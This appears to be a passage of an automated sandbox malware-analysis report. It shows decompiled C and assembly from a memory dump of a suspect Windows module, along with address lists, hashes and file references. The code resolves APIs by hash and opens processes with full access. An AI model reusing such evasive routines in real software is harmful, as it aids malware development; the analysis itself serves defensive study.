				asm("movq [ebp+0x4b8], xmm0");
				E6E9FF4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E9FF4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E9FF4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E9F1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E9FB27C( &_v248, _v256, _t481, _v252, _t318);
				E6E9FF840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v296, E6E9FF4CC(_t410) + 0x10);
				E6E9FF4BC( &_v300, E6E9FF4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v304, E6E9FF4CC(_t414) + 0x10);
				E6E9FF4BC( &_v308, E6E9FF4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v312, E6E9FF4CC(_t418) + 0x10);
				E6E9FF4BC( &_v316, E6E9FF4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6E9FF828( &_v320, E6E9FF4CC(_t422) + 0x10);
				E6E9FF4BC( &_v324, E6E9FF4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E9FB9FC(_t154,  *_t480);
				E6E9FF4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6E9FF4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E9FF4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E9FF4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E9FF654( &_v316);
				return E6E9FF654( &_v356);
			}

0x6e9f1494
0x6e9f1498
0x6e9f149d
0x6e9f14a3
0x6e9f14ab
0x6e9f14b0
0x6e9f14bc
0x6e9f14c0
0x6e9f14d2
0x6e9f14e8
0x6e9f14f3
0x6e9f14f4
0x6e9f14f5
0x6e9f14f6
0x6e9f14f7
0x6e9f14fa
0x6e9f14fe
0x6e9f1502
0x6e9f1509
0x6e9f151b
0x6e9f1531
0x6e9f153c
0x6e9f153d
0x6e9f153e
0x6e9f153f
0x6e9f1540
0x6e9f1543
0x6e9f1547
0x6e9f154b
0x6e9f1552
0x6e9f1564
0x6e9f157a
0x6e9f1585
0x6e9f1586
0x6e9f1587
0x6e9f1588
0x6e9f1589
0x6e9f158c
0x6e9f1590
0x6e9f1594
0x6e9f159b
0x6e9f15ad
0x6e9f15c3
0x6e9f15ce
0x6e9f15cf
0x6e9f15d0
0x6e9f15d1
0x6e9f15d2
0x6e9f15d5
0x6e9f15d9
0x6e9f15dd
0x6e9f15e4
0x6e9f15f6
0x6e9f160c
0x6e9f1617
0x6e9f1618
0x6e9f1619
0x6e9f161a
0x6e9f161b
0x6e9f161e
0x6e9f1622
0x6e9f1626
0x6e9f162d
0x6e9f163f
0x6e9f1655
0x6e9f1660
0x6e9f1661
0x6e9f1662
0x6e9f1663
0x6e9f1664
0x6e9f1667
0x6e9f166b
0x6e9f166f
0x6e9f1676
0x6e9f1688
0x6e9f169e
0x6e9f16a9
0x6e9f16aa
0x6e9f16ab
0x6e9f16ac
0x6e9f16ad
0x6e9f16b0
0x6e9f16b4
0x6e9f16b8
0x6e9f16bf
0x6e9f16d1
0x6e9f16e7
0x6e9f16f2
0x6e9f16f3
0x6e9f16f4
0x6e9f16f5
0x6e9f16f6
0x6e9f16f9
0x6e9f16fd
0x6e9f1701
0x6e9f1708
0x6e9f171a
0x6e9f1730
0x6e9f173b
0x6e9f173c
0x6e9f173d
0x6e9f173e
0x6e9f173f
0x6e9f1742
0x6e9f1746
0x6e9f174a
0x6e9f1751
0x6e9f1763
0x6e9f1779
0x6e9f1784
0x6e9f1785
0x6e9f1786
0x6e9f1787
0x6e9f1788
0x6e9f178b
0x6e9f178f
0x6e9f1793
0x6e9f179a
0x6e9f17ac
0x6e9f17c2
0x6e9f17cd
0x6e9f17ce
0x6e9f17cf
0x6e9f17d0
0x6e9f17d1
0x6e9f17d4
0x6e9f17d8
0x6e9f17dc
0x6e9f17e3
0x6e9f17f5
0x6e9f180b
0x6e9f1816
0x6e9f1817
0x6e9f1818
0x6e9f1819
0x6e9f181a
0x6e9f181d
0x6e9f1821
0x6e9f1825
0x6e9f182c
0x6e9f183e
0x6e9f1854
0x6e9f185f
0x6e9f1860
0x6e9f1861
0x6e9f1862
0x6e9f1863
0x6e9f1866
0x6e9f186a
0x6e9f186e
0x6e9f1875
0x6e9f1887
0x6e9f189d
0x6e9f18a8
0x6e9f18a9
0x6e9f18aa
0x6e9f18ab
0x6e9f18ac
0x6e9f18af
0x6e9f18b3
0x6e9f18b7
0x6e9f18be
0x6e9f18d0
0x6e9f18e6
0x6e9f18f1
0x6e9f18f2
0x6e9f18f3
0x6e9f18f4
0x6e9f18f5
0x6e9f18f8
0x6e9f18fc
0x6e9f1900
0x6e9f1907
0x6e9f1919
0x6e9f192f
0x6e9f193a
0x6e9f193b
0x6e9f193c
0x6e9f193d
0x6e9f193e
0x6e9f1941
0x6e9f1945
0x6e9f1949
0x6e9f1950
0x6e9f1962
0x6e9f1978
0x6e9f1983
0x6e9f1984
0x6e9f1985
0x6e9f1986
0x6e9f198c
0x6e9f198f
0x6e9f1991
0x6e9f199c
0x6e9f19a3
0x6e9f19ac
0x6e9f19b4
0x6e9f19bb
0x6e9f19c4
0x6e9f19cc
0x6e9f19d3
0x6e9f19dc
0x6e9f19e4
0x6e9f19eb
0x6e9f19f4
0x6e9f19fc
0x6e9f1a03
0x6e9f1a0c
0x6e9f1a14
0x6e9f1a1b
0x6e9f1a24
0x6e9f1a2c
0x6e9f1a36
0x6e9f1a3f
0x6e9f1a47
0x6e9f1a51
0x6e9f1a5a
0x6e9f1a62
0x6e9f1a6c
0x6e9f1a75
0x6e9f1a7d
0x6e9f1a87
0x6e9f1a90
0x6e9f1a98
0x6e9f1aa2
0x6e9f1aab
0x6e9f1ab3
0x6e9f1abd
0x6e9f1ac6
0x6e9f1ace
0x6e9f1ad8
0x6e9f1ae1
0x6e9f1ae9
0x6e9f1af3
0x6e9f1afc
0x6e9f1b04
0x6e9f1b0e
0x6e9f1b17
0x6e9f1b1f
0x6e9f1b26
0x6e9f1b2f
0x6e9f1b37
0x6e9f1b3e
0x6e9f1b43
0x6e9f1b51
0x6e9f1b55
0x6e9f1b64
0x6e9f1b6d
0x6e9f1b72
0x6e9f1b79
0x6e9f1b7d
0x6e9f1b81
0x6e9f1b88
0x6e9f1b9a
0x6e9f1bb0
0x6e9f1bbb
0x6e9f1bbc
0x6e9f1bbd
0x6e9f1bbe
0x6e9f1bbf
0x6e9f1bc2
0x6e9f1bc6
0x6e9f1bca
0x6e9f1bd1
0x6e9f1be3
0x6e9f1bf9
0x6e9f1c04
0x6e9f1c05
0x6e9f1c06
0x6e9f1c07
0x6e9f1c08
0x6e9f1c0b
0x6e9f1c0f
0x6e9f1c13
0x6e9f1c1a
0x6e9f1c2c
0x6e9f1c42
0x6e9f1c4d
0x6e9f1c4e
0x6e9f1c4f
0x6e9f1c50
0x6e9f1c51
0x6e9f1c54
0x6e9f1c58
0x6e9f1c5c
0x6e9f1c63
0x6e9f1c75
0x6e9f1c8b
0x6e9f1c96
0x6e9f1c97
0x6e9f1c98
0x6e9f1c99
0x6e9f1c9a
0x6e9f1c9d
0x6e9f1ca0
0x6e9f1ca1
0x6e9f1ca2
0x6e9f1ca9
0x6e9f1cac
0x6e9f1cb7
0x6e9f1cbe
0x6e9f1cc7
0x6e9f1ccf
0x6e9f1cd6
0x6e9f1cdf
0x6e9f1ce7
0x6e9f1cee
0x6e9f1cf7
0x6e9f1cff
0x6e9f1d04
0x6e9f1d0d
0x6e9f1d15
0x6e9f1d2a

Strings

8nsK, xrefs: 6E9F1900

Memory Dump Source

Source File: 00000001.00000002.810044742.000000006E9F1000.00000020.00020000.sdmp, Offset: 6E9F0000, based on PE: true

Associated: 00000001.00000002.810018026.000000006E9F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810134405.000000006EA0A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810166840.000000006EA0D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810188101.000000006EA0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
Instruction ID: 96df7c33bef3bd8b72e5dd5c395f3944b593e73206f188696eb20a0b994c65e4
Opcode Fuzzy Hash: 352d76c91212afd11de380c5d6904c807f5abc6bc6d3675186914b2ffa56fc16
Instruction Fuzzy Hash: FF326172414606DACB15DF60C8519EF77A4AFB120CF204F1DB5895A2A2FF71E98BCB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E9FA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E9FA4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E9FB658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E9FF4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E9FF654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6EA02234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E9FF654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E9FF584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E9FF584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6ea0b808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6EA03064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E9FF4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E9FF4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E9FB5C4(_t439 + 0x34);
											E6E9FB5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6E9FB5C4(_t439 + 0x34);
										E6E9FB5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6E9FF4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E9FCA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E9FC280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E9FF828(_t439 + 0x14, E6E9FF4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E9FF4BC(_t439 + 0x14, E6E9FF4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6EA03064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E9FF828(_t439 + 0x40, E6E9FF4CC(_t439 + 0x3c) + 4);
											 *(E6E9FF4BC(_t439 + 0x40, E6E9FF4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E9FCD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E9FF4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E9FF4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E9FAC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E9FCD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E9FF4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E9FF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E9FF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E9FF4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E9FF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6EA038F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E9FF4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E9FF828( *((intOrPtr*)(_t439 + 8)), E6E9FF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E9FF4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E9FF4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E9FF4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E9FF4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6EA038F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E9FF4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E9FF828( *((intOrPtr*)(_t439 + 4)), E6E9FF4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E9FF828( *((intOrPtr*)(_t439 + 8)), E6E9FF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E9FF4BC( *((intOrPtr*)(_t439 + 8)), E6E9FF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E9FF828( *((intOrPtr*)(_t439 + 4)), E6E9FF4CC( *_t439) + 4);
								 *(E6E9FF4BC( *((intOrPtr*)(_t439 + 4)), E6E9FF4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E9FF4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6EA03064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E9FF4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E9FF828( *((intOrPtr*)(_t439 + 8)), E6E9FF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E9FF4BC( *((intOrPtr*)(_t439 + 8)), E6E9FF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E9FF4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6E9FF828( *((intOrPtr*)(_t439 + 4)), E6E9FF4CC( *_t439) + 4);
										 *(E6E9FF4BC( *((intOrPtr*)(_t439 + 4)), E6E9FF4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E9FF4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E9FF4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E9FF4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E9FF4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E9FF4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E9FF4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6EA038F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E9FF4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E9FF828( *((intOrPtr*)(_t439 + 4)), E6E9FF4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6EA03064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E9FF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E9FF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E9FF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E9FF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E9FF4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6EA038F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E9FF4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E9FF828( *((intOrPtr*)(_t439 + 8)), E6E9FF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E9FF4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6e9fa4f2
0x6e9fa4f4
0x6e9fa4ff
0x6e9fa505
0x6e9fa509
0x6e9fa50e
0x6e9fa514
0x6e9fa524
0x00000000
0x6e9fa526
0x6e9fa526
0x6e9fa531
0x6e9fa531
0x6e9faaaf
0x6e9faab1
0x6e9faab2
0x6e9faaf1
0x6e9faaf5
0x6e9fab03
0x6e9fab11
0x6e9fab11
0x6e9faafc
0x6e9fab17
0x6e9fab1c
0x00000000
0x6e9fab1c
0x6e9fab00
0x6e9fab01
0x00000000
0x6e9fa53b
0x6e9fa53b
0x6e9fa53f
0x6e9fa646
0x6e9fa646
0x6e9fa64b
0x6e9fa75c
0x6e9fa760
0x6e9fa765
0x6e9fa769
0x6e9fa893
0x6e9fa895
0x6e9fa899
0x6e9fa8a2
0x6e9fa8ab
0x6e9fa8af
0x6e9fa8b8
0x6e9fa8bf
0x6e9fa8c0
0x6e9fa8c4
0x6e9fa8c8
0x6e9fa8cc
0x6e9fa8ce
0x6e9faa38
0x6e9faa38
0x6e9faa40
0x6e9faa58
0x6e9faa5a
0x6e9faa5c
0x6e9faa96
0x6e9faa96
0x6e9faa98
0x6e9faa98
0x6e9faa9b
0x6e9faab6
0x6e9faaca
0x6e9faacd
0x6e9faad2
0x6e9faadd
0x6e9faade
0x6e9faae1
0x6e9faae3
0x6e9faaec
0x00000000
0x6e9faaec
0x6e9faa9d
0x6e9faaa1
0x6e9faaaa
0x00000000
0x6e9faaaa
0x6e9faa6d
0x6e9faa7d
0x6e9faa81
0x6e9faa81
0x6e9faa84
0x6e9faa87
0x6e9faa8a
0x6e9faa90
0x00000000
0x00000000
0x00000000
0x6e9faa92
0x6e9fa8d6
0x6e9fa8d6
0x6e9fa8d8
0x6e9fa8dc
0x6e9fa8e1
0x6e9fa8e3
0x6e9fa8e7
0x6e9fa8ea
0x6e9fa8f2
0x6e9fa8f4
0x00000000
0x00000000
0x6e9fa90b
0x6e9fa926
0x6e9fa928
0x6e9fa93b
0x6e9fa93d
0x6e9fa93f
0x6e9fa95a
0x6e9fa95a
0x6e9fa95e
0x6e9fa960
0x00000000
0x00000000
0x6e9fa962
0x6e9fa965
0x6e9fa986
0x6e9fa9a5
0x6e9fa9ab
0x6e9fa9ae
0x6e9fa9b3
0x6e9fa9b4
0x6e9fa9b8
0x00000000
0x00000000
0x6e9fa9c0
0x6e9fa9c0
0x6e9fa9c2
0x6e9fa9ce
0x6e9fa9da
0x6e9fa9e4
0x6e9fa9e7
0x6e9fa9ea
0x6e9fa9ee
0x6e9fa9f5
0x6e9fa9f9
0x6e9fa9fd
0x6e9fa9fe
0x6e9faa02
0x6e9faa07
0x6e9faa0c
0x6e9faa10
0x6e9faa14
0x6e9faa1a
0x6e9faa20
0x6e9faa26
0x6e9faa2c
0x6e9faa31
0x6e9faa32
0x6e9faa32
0x00000000
0x6e9fa9c2
0x00000000
0x6e9fa965
0x6e9fa943
0x6e9fa954
0x6e9fa956
0x6e9fa958
0x00000000
0x00000000
0x00000000
0x6e9fa958
0x6e9fa96b
0x00000000
0x6e9fa96b
0x6e9fa76f
0x6e9fa772
0x6e9fa774
0x00000000
0x00000000
0x6e9fa77c
0x6e9fa77c
0x6e9fa77e
0x6e9fa77e
0x6e9fa78f
0x6e9fa791
0x6e9fa794
0x00000000
0x00000000
0x6e9fa88a
0x6e9fa88b
0x6e9fa88d
0x00000000
0x00000000
0x00000000
0x6e9fa88d
0x6e9fa79a
0x6e9fa79d
0x6e9fa7a7
0x6e9fa7ac
0x6e9fa7ae
0x6e9fa7b4
0x6e9fa7bb
0x6e9fa7bf
0x6e9fa7c4
0x6e9fa7c8
0x6e9fac03
0x6e9fac17
0x6e9fac3a
0x6e9fac3f
0x6e9fac3f
0x6e9fa7df
0x6e9fa7e4
0x6e9fa7e4
0x6e9fa7e4
0x6e9fa7e4
0x6e9fa7ea
0x6e9fa7ef
0x6e9fa7f1
0x6e9fa7f6
0x6e9fa7fd
0x6e9fa802
0x6e9fa804
0x6e9fabc1
0x6e9fabd2
0x6e9fabec
0x6e9fabf1
0x6e9fabf1
0x6e9fa81a
0x6e9fa81f
0x6e9fa81f
0x6e9fa81f
0x6e9fa81f
0x6e9fa833
0x6e9fa851
0x6e9fa856
0x6e9fa866
0x6e9fa883
0x6e9fa885
0x6e9fa885
0x00000000
0x6e9fa79d
0x6e9fa653
0x6e9fa653
0x6e9fa655
0x6e9fa65c
0x6e9fa66a
